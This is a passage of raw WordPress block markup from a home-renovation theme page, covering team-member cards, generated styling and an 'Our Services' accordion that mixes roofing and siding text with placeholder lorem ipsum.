leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\"></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 